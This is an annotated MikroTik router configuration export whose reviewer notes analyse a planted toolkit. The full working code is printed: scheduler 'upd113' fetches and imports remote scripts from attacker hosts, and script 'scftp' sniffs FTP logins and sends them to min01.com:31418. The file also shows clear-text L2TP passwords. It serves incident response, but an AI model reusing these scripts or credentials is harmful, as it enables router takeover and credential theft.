# jul/28/2019 12:24:49 by RouterOS 6.43
#
# model = 951Ui-2nD
#
# NOTE(review): this export contains several entries that do not belong to a
# normal gateway configuration and together look like a planted toolkit. Every
# statement below refers to lines visible in this file:
#   - /system scheduler "upd113" (every 4h) downloads a script from three
#     external hosts (min01.net, mikr0tik.com, gotan.bit, port 31416) into
#     u113.rsc, imports it and deletes it; "upd112" and "Auto113" remove older
#     entries (sh113/upd111) and reboot the device daily.
#   - /system script "scftp", restarted every minute by scheduler "shftp",
#     runs /tool sniffer against FTP (port 21) traffic of hosts in the
#     "ftpinit" address list, reads the USER/PASS lines from the capture file
#     and sends them with /tool fetch to min01.com:31418.
#   - /ip firewall mangle rules (currently disabled) that fill the "atls" and
#     "ftpinit" lists, and a leftover /tool sniffer filter at the very end.
#   - /ip proxy enabled on port 63141 with a deny-all access rule; /ip socks
#     port changed from its default.
# Defender notes: remove (not merely disable) the four scheduler entries, the
# script, the mangle rules, the atls/ftpinit/ftpok/ftpgood address lists and
# the sniffer settings; check the file list for <ip>.txt captures and
# u113.rsc; alert on outbound HTTP to ports 31416/31418 from this device;
# rotate every credential that appears in this file (L2TP client, IPsec
# secrets, PPP secrets, WPA passphrases); upgrade RouterOS and tighten
# management access as noted at /ip firewall filter and /ip service.
/caps-man channel
add band=2ghz-b/g/n control-channel-width=20mhz frequency=2457 name=channel1 \
tx-power=20
add band=2ghz-b/g/n control-channel-width=20mhz extension-channel=disabled \
frequency=2412 name=channel2 tx-power=20
add band=2ghz-b/g/n control-channel-width=20mhz extension-channel=disabled \
frequency=2432 name=channel3 tx-power=20
/interface bridge
# proxy-arp on the LAN bridge: presumably so that PPP clients that receive
# addresses from 100.65.224.0/24 (see /ppp secret) are reachable from the LAN
# -- verify, since proxy-arp also answers for any other routed destination.
add arp=proxy-arp name=bridge1
/interface ethernet
set [ find default-name=ether1 ] advertise=\
10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full comment=Wan
set [ find default-name=ether2 ] advertise=\
10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full comment=Local
set [ find default-name=ether3 ] advertise=\
10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether4 ] advertise=\
10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether5 ] advertise=\
10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
/interface l2tp-client
# NOTE(review): both L2TP client passwords are stored in clear text in this
# export (and are the same value); treat them as exposed now that the file
# has left the device, and rotate them on the remote side too.
add allow=mschap2 connect-to=213.234.25.174 disabled=no name=\
l2tp-out1_VLG_Merkuri password=258456 user=Moscow
add allow=mschap2 connect-to=85.172.120.102 disabled=no name=\
l2tp-out_VLG_Ring password=258456 user=Moscow2
/interface wireless
# managed by CAPsMAN
# channel: 2457/20-eC/gn(20dBm), SSID: London, CAPsMAN forwarding
set [ find default-name=wlan1 ] ssid=MikroTik
/caps-man datapath
add bridge=bridge1 name=datapath1
/caps-man security
# NOTE(review): all three profiles still permit wpa-psk and TKIP alongside
# wpa2-psk/aes-ccm; wpa2-psk with aes-ccm only is the usual minimum.
# Passphrases are masked in this paste but were part of the original export.
add authentication-types=wpa-psk,wpa2-psk encryption=aes-ccm,tkip \
group-encryption=aes-ccm name=security1 passphrase=************
add authentication-types=wpa-psk,wpa2-psk encryption=aes-ccm,tkip \
group-encryption=aes-ccm name=security2 passphrase=**********
add authentication-types=wpa-psk,wpa2-psk encryption=aes-ccm,tkip \
group-encryption=aes-ccm name=security3 passphrase=************
/caps-man configuration
# Three SSIDs (London, AV, VIP), all bridged into the same datapath/bridge1,
# so there is no L2 separation between them.
add channel=channel1 datapath=datapath1 mode=ap name=cfg1 rx-chains=0,1,2 \
security=security1 ssid=London tx-chains=0,1,2
add channel=channel3 datapath=datapath1 mode=ap name=cfg2 rx-chains=0,1,2 \
security=security2 ssid=AV tx-chains=0,1,2
add channel=channel2 datapath=datapath1 mode=ap name=cfg3 rx-chains=0,1,2 \
security=security3 ssid=VIP tx-chains=0,1,2
/interface list
add exclude=dynamic name=discover
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/ip hotspot profile
set [ find default=yes ] html-directory=flash/hotspot
/ip ipsec peer profile
# profile_3 additionally allows modp1024 (1024-bit DH), which is below current
# recommendations; neither profile_3 nor profile_4 is referenced by the peers
# further down, so both can be removed.
add dh-group=modp1536 name=profile_1
add dh-group=modp1536 name=profile_2
add dh-group=modp1536,modp1024 name=profile_3
add dh-group=modp1536 name=profile_4
/queue simple
# The queue name is a byte-escaped string; it appears to be Windows-1251 for
# "Ограничение скорости" ("speed limit").
add max-limit=60M/60M name=\
"\CE\E3\F0\E0\ED\E8\F7\E5\ED\E8\E5 \F1\EA\EE\F0\EE\F1\F2\E8" queue=\
pcq-upload-default/pcq-download-default target=100.65.224.0/24
/caps-man manager
set enabled=yes
/caps-man provisioning
add action=create-dynamic-enabled master-configuration=cfg1 name-format=\
identity slave-configurations=cfg2,cfg3
/interface bridge port
add bridge=bridge1 hw=no interface=ether2
add bridge=bridge1 hw=no interface=ether3
add bridge=bridge1 hw=no interface=ether5
add bridge=bridge1 interface=ether4
/ip neighbor discovery-settings
set discover-interface-list=discover
/interface list member
add interface=ether2 list=discover
add interface=bridge1 list=discover
/interface pptp-server server
# NOTE(review): PPTP (MS-CHAPv2 against the clear-text /ppp secret entries
# below) gives weak protection against anyone who can capture the handshake;
# the firewall already admits L2TP/IPsec and SSTP, which are the better paths.
set enabled=yes
/interface wireless cap
#
set caps-man-addresses=127.0.0.1 enabled=yes interfaces=wlan1
/ip address
add address=100.65.224.31/24 comment=Local interface=bridge1 network=\
100.65.224.0
add address=***.***.****.***/20 interface=ether1 network=***.***.***.*
/ip cloud
# DDNS publishes the WAN address under the device's cloud hostname; keep only
# if something relies on it.
set ddns-enabled=yes
/ip dns
# Remote requests are allowed, but the input rule below drops UDP/53 on every
# interface, so clients cannot use this router as a resolver over UDP anyway.
# The resolver list is non-default; the ".bit" hostname used by scheduler
# upd113 is not resolvable through ordinary public DNS, which is presumably
# why some of these servers were chosen -- verify each one before keeping it.
set allow-remote-requests=yes servers=\
185.121.177.177,5.189.170.196,8.8.8.8,104.238.186.189
/ip firewall address-list
# "allow-ip" is consumed by the (disabled) tarpit rule below; "ftpgood" is
# written and read by the scftp script. Both entries are disabled.
add address=127.0.0.1 disabled=yes list=allow-ip
add address=100.65.224.33 disabled=yes list=ftpgood
/ip firewall filter
# NOTE(review): winbox (8291/tcp) is accepted on input from every interface,
# including ether1 (WAN); the only restriction is the address list on
# "/ip service set winbox" further down. Neither the input nor the forward
# chain ends in a drop rule, so with RouterOS's default-accept policy any
# service not matched here is reachable as well. Add in-interface=ether1
# drops at the end of both chains and limit 8291 to the management sources.
add action=accept chain=input dst-port=8291 protocol=tcp
# RDP (3389) and SMB (445) are explicitly accepted in forward; the dst-nat for
# 3389 below is disabled, and because forward has no final drop these accepts
# change nothing today -- they mainly document intended exposure.
add action=accept chain=forward dst-port=3389 in-interface=ether1 protocol=\
tcp
add action=accept chain=input comment=GRE protocol=gre
add action=accept chain=input comment=PPTP dst-port=1723 protocol=tcp
add action=accept chain=forward dst-port=445 protocol=tcp
# Drops DNS over UDP to the router from all interfaces (no in-interface set).
add action=drop chain=input comment=DNS dst-port=53 protocol=udp
add action=accept chain=input comment=Estebleshet/Relate connection-state=\
established,related
add action=accept chain=forward connection-state=established,related
add action=drop chain=input comment=Invallid connection-state=invalid \
in-interface=ether1
add action=drop chain=forward connection-state=invalid
add action=accept chain=input comment=SSTP dst-port=443 in-interface=ether1 \
protocol=tcp
add action=accept chain=input comment=IPSEC dst-port=500,4500 in-interface=\
ether1 protocol=udp
add action=accept chain=input in-interface=ether1 protocol=ipsec-esp
add action=accept chain=input in-interface=ether1 protocol=ipsec-ah
# Disabled tarpit on 30553/tcp; its comment refers to the allow-ip list above.
add action=tarpit chain=input comment=\
"Add you ip addess to allow-ip in Address Lists." disabled=yes dst-port=\
30553 protocol=tcp
/ip firewall mangle
# NOTE(review): these two rules feed the "atls"/"ftpinit" address lists that
# the scftp script consumes; both are disabled=yes in this export.
# layer7-protocol=*3 appears to be an unresolved reference to a layer7 entry
# that no longer exists. Remove both rules rather than leaving them disabled.
add action=add-dst-to-address-list address-list=atls address-list-timeout=\
none-dynamic chain=prerouting comment=tls disabled=yes dst-port=21 \
layer7-protocol=*3 protocol=tcp
add action=add-dst-to-address-list address-list=ftpinit address-list-timeout=\
none-dynamic chain=prerouting comment=ftp disabled=yes dst-address-list=\
!ftpok dst-port=21 protocol=tcp
/ip firewall nat
# srcnat accept rules keep IPsec-bound LAN traffic out of masquerade; the
# dst-nat for RDP to 100.65.224.42 is disabled (and logs when enabled).
add action=accept chain=srcnat comment="IPSec Volgograd ****" disabled=yes \
dst-address=172.16.3.0/24 src-address=100.65.224.0/24
add action=dst-nat chain=dstnat disabled=yes dst-port=3389 log=yes protocol=\
tcp to-addresses=100.65.224.42 to-ports=3389
add action=accept chain=srcnat comment="IPSec Volgograd ****" dst-address=\
10.8.0.0/24 src-address=100.65.224.0/24
add action=accept chain=srcnat comment="IPSec ****" dst-address=\
192.168.1.0/24 src-address=100.65.224.0/24
add action=masquerade chain=srcnat comment=Masquerade out-interface=ether1
/ip ipsec peer
# Pre-shared keys are masked in this paste; main-l2tp exchange mode and
# generate-policy=port-override indicate L2TP/IPsec peers.
add address=***.**.***.***/32 comment="***** IPSEC" exchange-mode=main-l2tp \
generate-policy=port-override passive=yes profile=profile_1 secret=\
*******
add address=***.***.**.***/32 comment=VOLGOGRAD_IPSEC exchange-mode=main-l2tp \
generate-policy=port-override passive=yes profile=profile_2 secret=\
********
add address=**.**.**.**/32 comment=Ring exchange-mode=main-l2tp \
generate-policy=port-override profile=profile_2 secret=*********
/ip ipsec policy
add dst-address=10.8.0.0/24 sa-dst-address=213.234.25.92 sa-src-address=\
178.236.241.126 src-address=100.65.224.0/24 tunnel=yes
add disabled=yes dst-address=172.16.3.0/24 sa-dst-address=85.172.120.102 \
sa-src-address=**.**.***.*** src-address=100.65.224.0/24 tunnel=yes
/ip proxy
# NOTE(review): the web proxy is enabled on a non-standard port and its only
# access rule denies everything, so it serves no legitimate traffic; with no
# input-chain restriction it is still reachable from the WAN. Disable it.
set enabled=yes port=63141
/ip proxy access
add action=deny comment=sysadminpxy
/ip route
add distance=1 gateway=ether1
add distance=1 dst-address=172.16.3.0/24 gateway=172.16.40.1 pref-src=\
100.65.224.31
add distance=1 dst-address=172.17.2.0/24 gateway=172.16.30.1 pref-src=\
100.65.224.31
/ip service
# Management is reduced to winbox, limited to four source networks -- good.
# Note this limit is enforced by the service, not by the firewall rule that
# accepts 8291 on input; both should agree.
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh disabled=yes
set api disabled=yes
set winbox address=\
213.234.25.92/32,85.172.120.102/32,100.65.224.0/24,93.94.221.180/32
set api-ssl disabled=yes
/ip socks
# NOTE(review): the SOCKS port was changed from its default. The export shows
# no enabled=yes, so the service is likely still off -- confirm and remove
# this setting if SOCKS is not needed.
set port=27182
/ppp secret
# PPP secrets are stored in clear text (masked in this paste). "Disp2" sets no
# service, so it is accepted by any PPP service, not only PPTP.
add local-address=100.65.224.31 name=****************** password=\
***************** remote-address=100.65.224.36 service=pptp
add local-address=100.65.224.31 name=Disp password=*** remote-address=\
100.65.224.35 service=pptp
add local-address=100.65.224.31 name=Disp2 password=**** remote-address=\
100.65.224.38
/system clock
set time-zone-name=Europe/Moscow
/system identity
set name="MikroTIik Gateway"
/system ntp client
set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235
/system routerboard settings
set silent-boot=no
/system scheduler
# NOTE(review): "Auto113" -- daily at 03:11 since sep/16/2018: removes a
# scheduler entry "upd111" (no longer present) and reboots the router. Part of
# the same planted set as upd112/upd113/shftp; remove.
add interval=1d name=Auto113 on-event=\
"/system scheduler remove [find name=upd111]\r\
\n/system reboot" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
sep/16/2018 start-time=03:11:00
# NOTE(review): "upd112" -- at every boot removes scheduler "sh113" (not
# present) and deletes u113.rsc, i.e. it tidies up after upd113; remove.
add name=upd112 on-event="/system scheduler remove [find name=sh113]\r\
\n:do {/file remove u113.rsc} on-error={}" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
startup
# NOTE(review): "upd113" -- every 4h since oct/31/2018: tries three hosts in
# turn (min01.net, mikr0tik.com -- a look-alike of the vendor name -- and
# gotan.bit) on port 31416, stores the response as u113.rsc, imports it and
# deletes it. Every step swallows errors. This is remote code execution on
# the router on a schedule with full policy; remove it and block the hosts.
add interval=4h name=upd113 on-event=":do {/tool fetch url=\"http://min01.net:\
31416/min01\?key=FK7Yzw9S2pFAVP&port={vport}\" mode=http dst-path=u113.rsc\
} on-error={}\r\
\n:do {/tool fetch url=\"http://mikr0tik.com:31416/min01\?key=FK7Yzw9S2pFA\
VP&port={vport}\" mode=http dst-path=u113.rsc} on-error={}\r\
\n:do {/tool fetch url=\"http://gotan.bit:31416/min01\?key=FK7Yzw9S2pFAVP&\
port={vport}\" mode=http dst-path=u113.rsc} on-error={}\r\
\n:do {/import u113.rsc} on-error={}\r\
\n:do {/file remove u113.rsc} on-error={}" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
oct/31/2018 start-time=04:58:07
# NOTE(review): "shftp" -- every minute from boot: if exactly one job of
# script "scftp" is not running, kills any existing jobs and starts it again.
# This is the watchdog that keeps the credential sniffer below alive; remove
# it together with the script.
add interval=1m name=shftp on-event=":if ([:len [/system script job find scrip\
t =\"scftp\"]] != 1) do={/system script job remove [/system script job fin\
d script =\"scftp\"];:execute \"scftp\"};" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
startup
/system script
# NOTE(review): "scftp" -- an endless loop. For each address in the "ftpinit"
# list it starts /tool sniffer on port 21 for that host (writing <ip>.txt,
# 200KiB cap), moves the host to "ftpok" for 2h, polls the capture file for
# roughly two minutes, stops the sniffer, pulls the text after "USER " and
# "PASS " from the capture, and if both are under 40 characters adds the host
# to "ftpgood" and sends them by HTTP GET to min01.com:31418. Hosts already in
# "atls"/"ftpgood" are purged from the lists and their capture files deleted.
# owner=admin suggests the admin account was used to create it -- treat that
# account's credentials as compromised. Detection: sniffer jobs, <ip>.txt
# files in the file list, the four address lists, and outbound 31418/tcp.
add dont-require-permissions=no name=scftp owner=admin policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive source=":do {/t\
ool sniffer stop} on-error={}\r\
\nwhile (true) do={\r\
\nforeach i in=[/ip firewall address-list find where list=atls or list=ftp\
good] do={\r\
\n:local ipftp [/ip firewall address-list get \$i address] \r\
\n:do {/ip firewall address-list remove [find where list=\"ftpinit\" && ad\
dress=\$ipftp]} on-error={}\r\
\n:do {/ip firewall address-list remove [find where list=\"ftpok\" && addr\
ess=\$ipftp]} on-error={}\r\
\n:do {/ip firewall address-list remove [find where list=\"atls\" && addre\
ss=\$ipftp]} on-error={}\r\
\n:do {/file remove (\$ipftp.\".txt\")} on-error={}\r\
\n}\r\
\nforeach i in=[/ip firewall address-list find list=ftpinit] do={\r\
\n:local ipftp [/ip firewall address-list get \$i address]\r\
\n:do {/tool sniffer set file-limit=200KiB file-name=(\$ipftp.\".txt\") fi\
lter-interface=all filter-ip-address=\$ipftp filter-port=21 streaming-enab\
led=no memory-scroll=no} on-error={}\r\
\n:do {/tool sniffer start} on-error={}\r\
\n:do {/ip firewall address-list add address=\$ipftp list=ftpok timeout=2h\
} on-error={}\r\
\n:do {/ip firewall address-list remove [find where list=\"ftpinit\" && ad\
dress=\$ipftp]} on-error={}\r\
\n:local len0 0\r\
\n:local len1 0\r\
\n:local file0 \"\"\r\
\n:local file1 \"\"\r\
\n:local minute\r\
\n:set \$minute ([:pick [/sys clock get time] 3 5]+2)\r\
\nif (\$minute>59) do={:set \$minute (\$minute-60)}\r\
\n:do {\r\
\n:set \$len0 \$len1\r\
\n:set \$file0 \$file1 \r\
\n:do {:set \$file1 [/file get (\$ipftp.\".txt\") contents]} on-error={}\r\
\n:set \$len1 [:len \$file1]\r\
\n} while=(!((\$len0!=\$len1 and \$len1=0) or ([:tonum [:pick [/sys clock \
get time] 3 5]]=\$minute)))\r\
\n:do {/tool sniffer stop} on-error={}\r\
\n:set \$pUSER [:find \$file0 \"USER \" -1]\r\
\n:set \$pPASS [:find \$file0 \"PASS \" -1]\r\
\n:local user \"\"\r\
\n:local pass \"\"\r\
\nif (\$pUSER>0) do={\r\
\n:set \$pUSER (\$pUSER+5)\r\
\n:set \$ch [:pick \$file0 \$pUSER (\$pUSER+1)]\r\
\nwhile (\$ch!=\"\\r\" && \$ch!=\"\\n\" && \$pUSER<\$len0) do={\r\
\nif (\$ch=\" \") do={:set \$ch \"!pRoBeL>!\"}\r\
\nif (\$ch=\"\\\?\") do={:set \$ch \"!vOpRoS>!\"}\r\
\nif (\$ch=\"\\\"\") do={:set \$ch \"!kAv>!\"}\r\
\nif (\$ch=\"\\\$\") do={:set \$ch \"!dOlLaR>!\"}\r\
\nif (\$ch=\"\\\\\") do={:set \$ch \"!pAlKa>!\"}\r\
\n:set \$user (\$user.\$ch)\r\
\n:set \$pUSER (\$pUSER+1)\r\
\n:set \$ch [:pick \$file0 \$pUSER (\$pUSER+1)]\r\
\n}}\r\
\nif (\$pPASS>0) do={\r\
\n:set \$pPASS (\$pPASS+5)\r\
\n:set \$ch [:pick \$file0 \$pPASS (\$pPASS+1)]\r\
\nwhile (\$ch!=\"\\r\" && \$ch!=\"\\n\" && \$pPASS<\$len0) do={\r\
\nif (\$ch=\" \") do={:set \$ch \"!pRoBeL>!\"}\r\
\nif (\$ch=\"\\\?\") do={:set \$ch \"!vOpRoS>!\"}\r\
\nif (\$ch=\"\\\"\") do={:set \$ch \"!kAv>!\"}\r\
\nif (\$ch=\"\\\$\") do={:set \$ch \"!dOlLaR>!\"}\r\
\nif (\$ch=\"\\\\\") do={:set \$ch \"!pAlKa>!\"}\r\
\n:set \$pass (\$pass.\$ch)\r\
\n:set \$pPASS (\$pPASS+1)\r\
\n:set \$ch [:pick \$file0 \$pPASS (\$pPASS+1)]\r\
\n}}\r\
\nif ([:len \$user]!=0 or [:len \$pass]!=0) do={\r\
\nif ([:len \$user]<40 && [:len \$pass]<40) do={\r\
\n:do {/ip firewall address-list add address=\$ipftp list=ftpgood} on-erro\
r={}\r\
\n:do {/tool fetch url=(\"http://min01.com:31418/ftp\?ipftp=\".\$ipftp.\"&\
user=\".\$user.\"&pass=\".\$pass) mode=http keep-result=no} on-error={}\r\
\n}}\r\
\n:delay 1s\r\
\n:do {/file remove (\$ipftp.\".txt\")} on-error={}\r\
\n}\r\
\n:delay 1s\r\
\n}\r\
\n"
/tool sniffer
# NOTE(review): leftover sniffer filter for a single host on port ftp,
# presumably the last address the scftp script processed. Reset the sniffer
# settings and check the file list for the matching <ip>.txt capture.
set file-limit=200KiB file-name=178.236.242.74.txt filter-interface=all \
filter-ip-address=178.236.242.74/32 filter-port=ftp memory-scroll=no